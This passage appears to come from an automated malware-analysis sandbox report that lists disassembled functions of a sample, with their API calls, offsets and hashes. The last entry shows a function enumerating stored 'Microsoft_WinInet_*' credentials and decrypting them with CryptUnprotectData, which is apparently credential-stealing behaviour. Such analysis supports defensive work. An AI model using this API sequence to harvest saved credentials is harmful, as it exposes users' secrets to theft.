Function 00412ADA, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412ADF

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b24f0c023898c4c869bde089e108d65dcfc0ca38964ed7df08f49314f7b10d71
Instruction ID: 127a4855fb90a994a4a02d335828b58873778862871b08616932928f1525ad79
Opcode Fuzzy Hash: b24f0c023898c4c869bde089e108d65dcfc0ca38964ed7df08f49314f7b10d71
Instruction Fuzzy Hash: 06218E75A056018FDB29CF29C180AABB7F1FF89300B14866ED816DBB00D7B8F846CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00413886, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041388B

Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b9e46aa26a23737d396955e57df94d5364da21e13b356acaf24135aeaf177474
Instruction ID: e0e9e3466cc930e456ed994cce60529752f33af2ff264595590bafee3097d804
Opcode Fuzzy Hash: b9e46aa26a23737d396955e57df94d5364da21e13b356acaf24135aeaf177474
Instruction Fuzzy Hash: 70219DB1A013149FDB65DF69C88479ABBF0AF08304F0084AED50AA7792D775AE04CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0043E0F8, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000,0542AFD8,?,0542AFD8,?,0043E75E,0542B06C,00004000), ref: 0043E163

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e8f0321b907f8c93eff9f9fe80aa9f9a4d2c7ab348c1fb85dc6ceb18b6bb5835
Instruction ID: b8c3acaed76ea71400faf53aace5318325b6ba4514e0b8ac76d2e751ebdd2552
Opcode Fuzzy Hash: e8f0321b907f8c93eff9f9fe80aa9f9a4d2c7ab348c1fb85dc6ceb18b6bb5835
Instruction Fuzzy Hash: 9B119A31601515FBDB05DF26C804A9ABBB9FF08764F10811AF86897250DB30FE61DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00414D6C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 004090F5

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: 3458784e09e47c700dd5185ea7c92475e2b555999181cbe69e45770db9ba27b9
Instruction ID: 251cd1cbde13bf4c341522c7ccce1db13cd85876ec4737e2f77db5c4961eba8a
Opcode Fuzzy Hash: 3458784e09e47c700dd5185ea7c92475e2b555999181cbe69e45770db9ba27b9
Instruction Fuzzy Hash: 53F0447250020C67CB24BBA6D802C9FBB9C9E00368B50043FF90897242EB39DE0483DE

Uniqueness

Uniqueness Score: -1.00%

Function 0045A8FE, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0045A938

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 612a1abec5923c488ebb59fc330e05bb17ffe2dc4446500d9ec8559e1d33c293
Instruction ID: f3ba4f7996b305dadc24657f6488ca3712718daac0c1ff3c745a6b17617cb164
Opcode Fuzzy Hash: 612a1abec5923c488ebb59fc330e05bb17ffe2dc4446500d9ec8559e1d33c293
Instruction Fuzzy Hash: 8E1148B1A0420AAFCF05DF58E94198F7BF4EF48304F05406AF805EB352D634DA25CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043E9C5, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043E9CA

Part of subcall function 0043DBE2: CreateFileMappingA.KERNEL32 ref: 0043DC15

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFileH_prologMapping
String ID:
API String ID: 3367180550-0
Opcode ID: d64d4aa17e2adaf32635f94d8ef839382d33390163fd8f28caf12e903a2f28a7
Instruction ID: cc7c395e0eb8e052096abd9c2256c719d51126836da7d164bd1a85b90316bbdc
Opcode Fuzzy Hash: d64d4aa17e2adaf32635f94d8ef839382d33390163fd8f28caf12e903a2f28a7
Instruction Fuzzy Hash: 011170B0911B119FC3A0DF3AD80161ABAF4FF48710B10892FE19AD3B81E778A500CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFFF, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8e2b376a1d5bd31ae04d1a7a932967fba1ec4f5808461264f66b7bb6ef01c9f2
Instruction ID: 941fd2b4e4699c03d34950e30c923efa3b28c70746c31d4bc35f3efe690fa374
Opcode Fuzzy Hash: 8e2b376a1d5bd31ae04d1a7a932967fba1ec4f5808461264f66b7bb6ef01c9f2
Instruction Fuzzy Hash: 4A01A7B0A04204AFDB348E14CC40BF23F99EB59358F34847BE005CD243D26ADDCB9A59

Uniqueness

Uniqueness Score: -1.00%

Function 0041431D, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00414374

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 72ef3b868f647264f689e25442187e8132213525ccc45311c638b10b8770a583
Instruction ID: 53af2e0a4a2d5bbafcd996743a5083da4ffb5b29c1bc799091ee148351c004be
Opcode Fuzzy Hash: 72ef3b868f647264f689e25442187e8132213525ccc45311c638b10b8770a583
Instruction Fuzzy Hash: 2C01F2B2200205BFE7149F5AD88199EBBFCFB89354B20011FF919C7241DB74AD9087B8

Uniqueness

Uniqueness Score: -1.00%

Function 0042545D, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00425462

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f35aff874b99dbdca0dc5426224d6e52a1ba518a0ceeffadeb9452a264c6c8b4
Instruction ID: 29912e311f85f1c739451af4d319ed9124db17e1086fe97018a63c1267ba8821
Opcode Fuzzy Hash: f35aff874b99dbdca0dc5426224d6e52a1ba518a0ceeffadeb9452a264c6c8b4
Instruction Fuzzy Hash: 64018BB2900218AEC701EFA9C9016EEBBB8EB54304F10446FE45AE3241EBB85A45C755

Uniqueness

Uniqueness Score: -1.00%

Function 0041F06A, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(000000FF,00000244,00000000,00000000,00000000,?,0000FFFF,00000244,?,0041F292,00000001,00000000,?,00000000,00000244), ref: 0041F090

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: acaac340ea075798355b7a76716ac3f8d807ef000a523cb7dba276451aed9ca5
Instruction ID: b2856fa76417eeaae25239adddc27ac655f403bf8eafa223ee5e10a7ae46ea81
Opcode Fuzzy Hash: acaac340ea075798355b7a76716ac3f8d807ef000a523cb7dba276451aed9ca5
Instruction Fuzzy Hash: 3D019E31600105BFE708CF19D881AA6BBB9FB84304F04822AE40587651E3B1BD948BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00445166, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f874ddcf992f3c3c6c59b5b3d98718a30df31dcc146f703c06fc5feda4c2f9c5
Instruction ID: 13684ca19e7c19ffe86e0d6c3d5b9d4de08ff2cfd1c634039dab65eabff4720b
Opcode Fuzzy Hash: f874ddcf992f3c3c6c59b5b3d98718a30df31dcc146f703c06fc5feda4c2f9c5
Instruction Fuzzy Hash: CEF0A932901E1457EE31666A9C05B5B32989F42379F25071FFD24922D3DF7CE80A869E

Uniqueness

Uniqueness Score: -1.00%

Function 00420568, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042056D

Part of subcall function 0041FCB2: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
Part of subcall function 0041FCB2: _strlen.LIBCMT ref: 0041FCD8

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectoryH_prolog_strlen
String ID:
API String ID: 1906034785-0
Opcode ID: 2e11c9215a7ba952f10d9dec40afdaeaee524692f695b28bfd3b63b049fecccb
Instruction ID: 8f4f766da947a39cfd01fa68859b9d028871f64d1bddd01dbdfe974dcb1ef4d4
Opcode Fuzzy Hash: 2e11c9215a7ba952f10d9dec40afdaeaee524692f695b28bfd3b63b049fecccb
Instruction Fuzzy Hash: BA01AC71611702AFD3449F399C857AABAE8FF45324F10432FE025D72D2DB789941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA9C, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AAA1

Part of subcall function 0040A9DC: __EH_prolog.LIBCMT ref: 0040A9E1
Part of subcall function 0040A9DC: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$___std_fs_directory_iterator_open@12
String ID:
API String ID: 1512400408-0
Opcode ID: b559db8ff5c56a8f67874d0cfc07117f73eac39842f714beab7192a8586eefe9
Instruction ID: e377c236dd62adbf3a3ef1934febb3bb85398013c8040f262c9f5580056daf97
Opcode Fuzzy Hash: b559db8ff5c56a8f67874d0cfc07117f73eac39842f714beab7192a8586eefe9
Instruction Fuzzy Hash: EE0161719057059FCB28DF69819069FBBF4AF04314F10462FE49693381D7745A44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004432AB, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,004090EB,?,?,?,004090EB,?,004853BC), ref: 0044330B

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6d3b6d219a65d389eb07bd5724334a8312a99a1b504d183091fa00f37f957b9f
Instruction ID: ced3907a3b2210f9ce9edbeb5fb51bc84ac3ea0f2c6ce6fc13b9c1240df1d890
Opcode Fuzzy Hash: 6d3b6d219a65d389eb07bd5724334a8312a99a1b504d183091fa00f37f957b9f
Instruction Fuzzy Hash: 4A01A735A00318ABD7019F5CD841B9EBBB8FF49711F15419AED45AB350D7B0DE01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004358BF, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004358C4

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID:
API String ID: 3708980276-0
Opcode ID: 89e1e6be86672151d722dd72355b079b3883042df619061e8c55caf481aa3862
Instruction ID: 3ada8ef7e2e24ce2e81baca482ce23796fb67891aeb905a5008453c2beaee78c
Opcode Fuzzy Hash: 89e1e6be86672151d722dd72355b079b3883042df619061e8c55caf481aa3862
Instruction Fuzzy Hash: 16F08672A001186BCB05AB59CC41DEEBB7CEF48324F04412FF816E3281DB785D55C664

Uniqueness

Uniqueness Score: -1.00%

Function 00464160, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004641C3

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a94c1e8ed22497acdbef1ba1fd8e7d8ffb3c70f8b820077d0e9993faea048f79
Instruction ID: 027a2c0be38452a1ce383e2f5702291adaac393c38664a96b0ec204eb3fac7d3
Opcode Fuzzy Hash: a94c1e8ed22497acdbef1ba1fd8e7d8ffb3c70f8b820077d0e9993faea048f79
Instruction Fuzzy Hash: B9018F72C04119BFCF01AFA88C059EE7FB5BF48314F14416AFD14E21A1E6358A60DB85

Uniqueness

Uniqueness Score: -1.00%

Function 004129C7, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004129CC

Part of subcall function 00413DA4: __EH_prolog.LIBCMT ref: 00413DA9
Part of subcall function 00413DA4: std::_Lockit::_Lockit.LIBCPMT ref: 00413DB7
Part of subcall function 00413DA4: int.LIBCPMT ref: 00413DCE
Part of subcall function 00413DA4: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E1E

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1350124489-0
Opcode ID: 461c48fe403ac9d440876e6ec101c94ff546250139541d0ad5f7d4e8eeb681a4
Instruction ID: c434b697f8c53097445019a40e5bb927d44771b075c49f0c0e8e2ea380da5454
Opcode Fuzzy Hash: 461c48fe403ac9d440876e6ec101c94ff546250139541d0ad5f7d4e8eeb681a4
Instruction Fuzzy Hash: 8701A771A20110DFD755EB55CA05BEE73E4EF08705F00402EB405E7292DBB8EE50CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00412A7D, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412AAA

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 28c425e206b2cf52dfe04f639bab851ea583fd6e8d2ca6656d372f70f48ae937
Instruction ID: 6305011c448af9afa4e7a6cbf9ceec4a18130464e38a37beee459292c0497857
Opcode Fuzzy Hash: 28c425e206b2cf52dfe04f639bab851ea583fd6e8d2ca6656d372f70f48ae937
Instruction Fuzzy Hash: 42015E74209B008FD369CF29E580952B7F1FF8A3103558A9EE89A8BB64C774BC51CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0045850D, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045736D,00000001,00000364,00000008,000000FF,?,004401D2,?,?,00414650,?), ref: 0045854E

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c345846cde28818473ef1ab384f8890cfd72d6d7708f8b97ff4e09b516dbed37
Instruction ID: 3dc3b3e41f486f9b69d6d19c1eacb35d909ce3a086fcaed822057e797154ffcd
Opcode Fuzzy Hash: c345846cde28818473ef1ab384f8890cfd72d6d7708f8b97ff4e09b516dbed37
Instruction Fuzzy Hash: 46F0BB3160012CBADB225B269C05B5B3798AF417A2B15441FAD05B6353EE68DD0D86ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040A981, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040A99A

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindNext___std_fs_directory_iterator_advance@8
String ID:
API String ID: 3878998205-0
Opcode ID: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
Instruction ID: 786aef3f6954a22798eff1a87afa34900a3c8d969515b4c2b0423792bc31befd
Opcode Fuzzy Hash: b14b9e766cb8d11d923b8eae4732c20c70cd9244aa0c3be2c5f5584d1c561765
Instruction Fuzzy Hash: A3F0E97131070457EB346626CD4577BB3A8AF80315F010C7FA981F31C1E6B8AC50855E

Uniqueness

Uniqueness Score: -1.00%

Function 0045918E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: be8b65e2839ea773a393bfd8d8c218399c99b2fc238a0e1b1befe52690129737
Instruction ID: 56f4cfcb82363ac18a679079ea8552777963f317c6836842f6b813f2b54360bc
Opcode Fuzzy Hash: be8b65e2839ea773a393bfd8d8c218399c99b2fc238a0e1b1befe52690129737
Instruction Fuzzy Hash: BAE0A035100A33E6BA2126669C0875B3A49DB023A6F1D0527AC0592783DB28CC0985ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040A676, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040A67D

Part of subcall function 0040A2D4: __EH_prolog.LIBCMT ref: 0040A2D9

Part of subcall function 004432AB: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,004090EB,?,?,?,004090EB,?,004853BC), ref: 0044330B

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DispatcherExceptionH_prologH_prolog2User
String ID:
API String ID: 3749479025-0
Opcode ID: 99ccd330fd4a6753e60d74d0b541b7613ba37950da2ba482a7cb4de1227d0878
Instruction ID: 6cdaae375658fcdab4018d469116dcf97d3cd22aaeaeab6f728bc95c36adb6c4
Opcode Fuzzy Hash: 99ccd330fd4a6753e60d74d0b541b7613ba37950da2ba482a7cb4de1227d0878
Instruction Fuzzy Hash: 64F08C31910118BADB10FBA1CC4AFDE7B38BF04308F1480AAB144B70D1EB38AA08CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC66, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 004137E4: __EH_prolog.LIBCMT ref: 004137E9

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d696504663ba625c4643022ee5aed457fcf869ffacf77d854e01dfb2a1a3e385
Instruction ID: 7b56fd564ee5dba22c1b256a7910ee9a5b5d76db5c36e8c87beafa9b19ca48cc
Opcode Fuzzy Hash: d696504663ba625c4643022ee5aed457fcf869ffacf77d854e01dfb2a1a3e385
Instruction Fuzzy Hash: 27E06DB1A247159BCB14DF68C80168AB6E4EB58758B10C93FA445E3340E778DA008788

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF03, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00413886: __EH_prolog.LIBCMT ref: 0041388B

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1c6f3859541c96ff36899086369ec62dc06fc6e134c0e1a876c6ff1225329e3e
Instruction ID: 6095d6418412deed06a35367cec5ea556f7f2b94be48555c84b2d961f3d52009
Opcode Fuzzy Hash: 1c6f3859541c96ff36899086369ec62dc06fc6e134c0e1a876c6ff1225329e3e
Instruction Fuzzy Hash: 37E06DB2A257159BCB18DF68C80168A76E4EB18758B10C93FB445E3300E778DA008788

Uniqueness

Uniqueness Score: -1.00%

Function 0043F433, Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 8880be27594fe1dc46eab3789d79d605a080d5e10a8aa48689f371cbc42518ee
Instruction ID: 558cf98cde0a510390d68fe92a3eaff0fba5e2f9fa2b07517afb1c2e6d705b46
Opcode Fuzzy Hash: 8880be27594fe1dc46eab3789d79d605a080d5e10a8aa48689f371cbc42518ee
Instruction Fuzzy Hash: 7FD0C9B6501118BFFA012B959C05CF7BB9CEF197A1B009022FE44CA011D5729D1097B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041C959, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

___std_fs_set_current_path@4.LIBCPMT ref: 0041C967

Part of subcall function 0040A676: __EH_prolog2.LIBCMT ref: 0040A67D

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog2___std_fs_set_current_path@4
String ID:
API String ID: 2482923176-0
Opcode ID: f4617e3132e9913c34343accb15db7cc2e7aad98cc5acdebcf4332c6d525c0e2
Instruction ID: 0a86e6c55615681b0d0e75044d596b77bbb09aa8d0d1ee6bb9c17a49818965c4
Opcode Fuzzy Hash: f4617e3132e9913c34343accb15db7cc2e7aad98cc5acdebcf4332c6d525c0e2
Instruction Fuzzy Hash: A6C01270A72B2043CA24656DBD488C751DD5F0F709710887FB881D3604D578CD8546EC

Uniqueness

Uniqueness Score: -1.00%

Function 00412F2D, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00412F3C

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 3f9308d64d38a26f490ee6755bac7ef647f435150ffc285641e4572aa6ae8d19
Instruction ID: 10cf1057b39a453f28e862301a9428c92d1bb2c0edcf9b409483b8ecb0c5bb88
Opcode Fuzzy Hash: 3f9308d64d38a26f490ee6755bac7ef647f435150ffc285641e4572aa6ae8d19
Instruction Fuzzy Hash: D0D05E310046008FF3349E08F1017A277E5EB01314F20094EE0D5C6591C7A95CC4879D

Uniqueness

Uniqueness Score: -1.00%

Function 00463EA7, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e37b2f97575dc0254c26ad9aa3f0fa52951ac1588ed93c35a03c0d82901148c
Instruction ID: 1683f18ab777b9f427d836d21452a745f8e35c4b12b45357bacd302cc903320f
Opcode Fuzzy Hash: 7e37b2f97575dc0254c26ad9aa3f0fa52951ac1588ed93c35a03c0d82901148c
Instruction Fuzzy Hash: 28D06C3210010DBBDF128F94DC06EDA3BAAFB4C714F018050FA1856020C772E821AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00435DD0, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00435DEB

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b5ee8a5701466d33f9cbc78514380c3bbbdd93b9be7c2a415b78b77fc25f71fa
Instruction ID: 6223cfaa72ab82669a20bc440cf7149b8fb7925aead8d04b015655650725991c
Opcode Fuzzy Hash: b5ee8a5701466d33f9cbc78514380c3bbbdd93b9be7c2a415b78b77fc25f71fa
Instruction Fuzzy Hash: 93D0C974D0810DEBCF50DB90D949AC9B7BCAB04308F0004A294C1E3140EAF4ABCA9B91

Uniqueness

Uniqueness Score: -1.00%

Function 00445A55, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445A68

Part of subcall function 00457FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?), ref: 00457FF9
Part of subcall function 00457FE3: GetLastError.KERNEL32(?,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?,?), ref: 0045800B

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: e604c8a294d64a0052e12ad6042e8ff2da1b84093215c4a0307e54f67f5992e0
Instruction ID: 22d6937be2526dc59ff857a35040620ee46eab35b37312ddff15c65259e4e18c
Opcode Fuzzy Hash: e604c8a294d64a0052e12ad6042e8ff2da1b84093215c4a0307e54f67f5992e0
Instruction Fuzzy Hash: ACC04C72504208BBDB05DB46D90AE4E7BA9DB80368F204059F81557251DAB5EF449694

Uniqueness

Uniqueness Score: -1.00%

Function 0042A869, Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0042A878

Part of subcall function 0042A224: CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244

Part of subcall function 0042A130: lstrlenW.KERNEL32(?), ref: 0042A156
Part of subcall function 0042A130: lstrlenW.KERNEL32(00000002), ref: 0042A167
Part of subcall function 0042A130: CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
Part of subcall function 0042A130: CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
Part of subcall function 0042A130: LocalFree.KERNEL32(?), ref: 0042A200
Part of subcall function 0042A130: CredFree.ADVAPI32(?), ref: 0042A219

Part of subcall function 0042A2F9: GetVersionExW.KERNEL32(?), ref: 0042A341
Part of subcall function 0042A2F9: LoadLibraryA.KERNEL32(?), ref: 0042A395
Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CredFreelstrlen$CreateCryptDataEnumerateInitializeInstanceLibraryLoadLocalUnprotectVersion
String ID:
API String ID: 1367598280-0
Opcode ID: 6c80f3bb9b7919e58b39df1b233aa9bb1dc29917460d2c4c51bb628cb8dc8a73
Instruction ID: ebd16326eb686ad43e5c991a10910887fe2c550f7f1a0d1f856031dafe3edce1
Opcode Fuzzy Hash: 6c80f3bb9b7919e58b39df1b233aa9bb1dc29917460d2c4c51bb628cb8dc8a73
